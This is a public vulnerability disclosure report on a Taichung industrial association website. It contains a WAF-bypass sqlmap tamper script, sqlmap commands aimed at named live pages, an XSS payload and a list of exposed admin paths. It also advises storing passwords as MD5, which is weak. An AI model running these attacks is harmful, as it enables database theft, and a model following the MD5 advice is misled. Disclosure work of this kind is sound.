Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00210
- 發信 Vendor: 台中市工業會
- Title: 台中市工業會 網站存在 XSS 與 SQL injection
- Introduction: 網站存在 XSS 與 SQL injection
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/05/21 23:27:01 : 新提交 (由 BTtea 更新此狀態)
- 2023/05/21 23:30:18 : 新提交 (由 BTtea 更新此狀態)
- 2023/05/29 09:35:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 21:15:44 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 21:15:44 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 21:15:44 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/07/21 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00210
- 通報者:blacktea_player (BTtea)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
http://www.tccia.org.tw/photod.php
http://www.tccia.org.tw/newsshow.php
https://www.tccia.org.tw/member.php
敘述
使用工具 SQLmap 輔助測試 (以下若使用SQLmap工具進行注入時有中斷問題,請去除 --batch 參數後進行注入,遇到詢問連線異常是否繼續測試的訊息請選擇預設默認選項,通常是 y )
以下測試需附上我所撰寫的防火牆規則繞過腳本,將以下內容存成 chivalrytainan.py 並放到 sqlmap -> tamper 資料夾裡,以供下方測試復現工具執行過程所引用
#!/usr/bin/env python
def dependencies():
pass
def tamper(payload:str, **kwargs):
if payload:
# union-based exploit
if 'UNION ALL SELECT' in payload:
payload=payload.replace('UNION ALL SELECT','UNION--+-%0aSELECT')
# WAF filter bypass
if 'INFORMATION_SCHEMA' in payload:
payload=payload.replace('INFORMATION_SCHEMA','InFOrMAtION_SCHeMA')
if 'SCHEMATA' in payload:
payload=payload.replace('SCHEMATA','SCheMaTA')
if 'schema_name' in payload:
payload=payload.replace('schema_name','scHeMa_nAme')
if 'database_name' in payload:
payload=payload.replace('database_name','dAtAbaSe_nAme')
if 'mysql' in payload:
payload=payload.replace('mysql','mYsQl')
if 'innodb_table_stats' in payload:
payload=payload.replace('innodb_table_stats','inNoDb_tAblE_sTatS')
if 'table_schema' in payload:
payload=payload.replace('table_schema','tAblE_scHEma')
payload=payload.replace('-- ','--%20')
return payload.replace(' ','/*%26*/')由於該站點的 wschkid cookie 大概會5~10分鐘就更新一次,因此注入的測試參數,--cookie 內的 wschkid 與 PHPSESSID 過期就要跟著換,不然測試不到。
-
SQL injection
http://www.tccia.org.tw/cont.php?proid=20160506152120&prokid=20160506032056
GET 參數 prokid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄,加上 --dbs 列出所有資料庫 )python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "http://www.tccia.org.tw/cont.php?proid=20160506152120&prokid=20160506032056" --tamper tccia,randomcase --batch -v 3 -p prokid --technique BET --cookie "wschkid=9f0f7a84599e8f4aae7940b4e1cb2961d7dcafed.1684694170.1;PHPSESSID=csfsqtep42gth5h0vmu8vh6fl5"運行結果
http://www.tccia.org.tw/photod.php?proid=20160513111817&prokid=20160506084936&picid=3
GET 參數 picid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄,加上 --dbs 列出所有資料庫 )python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "http://www.tccia.org.tw/photod.php?proid=20160513111817&prokid=20160506084936&picid=3" --tamper tccia,randomcase --batch -p picid --technique BET --cookie "wschkid=624f6f6025870f180811a01e06e3dcbb68f9dbd5.1684691660.1;PHPSESSID=d0cf8c44rcns7tsfm8u768rav5"運行結果
http://www.tccia.org.tw/newsshow.php?newsid=20230315064629&proid=20160512105738&prokid=20160506084936
GET 參數 newsid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄,加上 --dbs 列出所有資料庫 )python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "http://www.tccia.org.tw/newsshow.php?newsid=20230315064629&proid=20160512105738&prokid=20160506084936" --tamper tccia,randomcase --batch -p newsid --technique T --cookie "wschkid=de6b6ff7f0cb1ea81e570aedc4c31dd79a238aa6.1684690553.1;PHPSESSID=do10b8pfcf90ld774thntl6gr1"運行結果
https://www.tccia.org.tw/member.php?proid=20160523110509&prokid=20160506085059&zone=400&pkind=&name=本店&Project=&submit=確認送出
GET 參數 zone , pkind , name , Project 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄,加上 --dbs 列出所有資料庫)
zonepython3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "https://www.tccia.org.tw/member.php?proid=20160523110509&prokid=20160506085059&zone=400&pkind=&name=本店&Project=&submit=確認送出" --tamper tccia,randomcase --batch -v 3 --technique BET --prefix "'" --cookie "wschkid=1ab00e262bff70c38ff9f6014d0b318eb7606f4a.1684702297.1;PHPSESSID=tpp0hm63gbc0mjtjiqgv97i0m0" -p zone運行結果
pkind
python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "https://www.tccia.org.tw/member.php?proid=20160523110509&prokid=20160506085059&zone=400&pkind=&name=本店&Project=&submit=確認送出" --tamper tccia,randomcase --batch -v 3 -p pkind --technique BET --prefix "'" --cookie "wschkid=4a98e208990e12905854f74e003bf222e60649ec.1684703394.1;PHPSESSID=3aq2t2do4d07c5h89vs6vom4q5"運行結果
name
python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "https://www.tccia.org.tw/member.php?proid=20160523110509&prokid=20160506085059&zone=400&pkind=&name=本店&Project=&submit=確認送出" --tamper tccia,randomcase --batch -v 3 -p name --technique T --cookie "wschkid=1c11b07f9ecdff670b54a97825074b7e5974ef27.1684706296.1;PHPSESSID=14cpmfquo59kno4uj46qno1ds6"運行結果
Project
python3 sqlmap.py --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" --random-agent -u "https://www.tccia.org.tw/member.php?proid=20160523110509&prokid=20160506085059&zone=400&pkind=&name=本店&Project=&submit=確認送出" --tamper tccia,randomcase --batch -v 3 -p Project --technique BET --prefix "'" --cookie "wschkid=99ea19feb6efd9f36a6d36a002bdc26cfdb6f7ea.1684703801.1;PHPSESSID=vje9frqbuh2tp6j6ksj1tsbfq4"運行結果
-
XSS
https://www.tccia.org.tw/photod.php?pageNum_phd=0&totalRows_phd=23&proid=20160513111817&prokid=20160506084936&picid=3
https://www.tccia.org.tw/photod.php?pageNum_phd=0&totalRows_phd=23&proid=20160513111817&prokid=20160506084936&picid=3
GET 參數 totalRows_fe , totalRows_phd 存在 XSS
xss payload<img src=1 onerror=alert(document.domain)>運行結果
-
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
http://www.tccia.org.tw/.DS_Store
http://www.tccia.org.tw/.ftpquota
http://www.tccia.org.tw/_mmServerScripts/MMHTTPDB.php
http://www.tccia.org.tw/admin/login.php (後台管理系統)
http://www.tccia.org.tw/controlpanel
http://www.tccia.org.tw/cpanel
http://www.tccia.org.tw/kpanel
http://www.tccia.org.tw/mailman/listinfo
http://www.tccia.org.tw/phpMyAdmin/index.php (phpMyAdmin資料庫管理頁面)
http://www.tccia.org.tw/phpinfo.php (後端架構)
修補建議
建議存在資料庫的密碼用MD5加密後存放,並且應該要夠複雜,後臺密碼應該加密,會員帳戶帳密也全部都是弱密碼,就算SQL都修好,也很容易就能爆破出來。
建議可以使用 htmlspecialchars 函式來預防 XSS
htmlspecialchars用法:
https://www.w3schools.com/php/func_string_htmlspecialchars.asp
XSS攻擊防禦原理解說:(wiki):
https://zh.wikipedia.org/zh-tw/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC
建議可以使用 PDO 框架或者 mysqli_real_escape_string 函式,或者改寫成參數化查詢來預防 SQL injection。
PDO用法:
https://blog.tarswork.com/article/quick-start-operation-mysql-using-php-pdo/
mysqli_real_escape_string用法:
https://www.runoob.com/php/func-mysqli-real-escape-string.html
參數化查詢原理解說(wiki):
https://zh.wikipedia.org/zh-tw/%E5%8F%83%E6%95%B8%E5%8C%96%E6%9F%A5%E8%A9%A2
SQL injection 攻擊成因解說(wiki):
https://zh.wikipedia.org/zh-tw/SQL%E6%B3%A8%E5%85%A5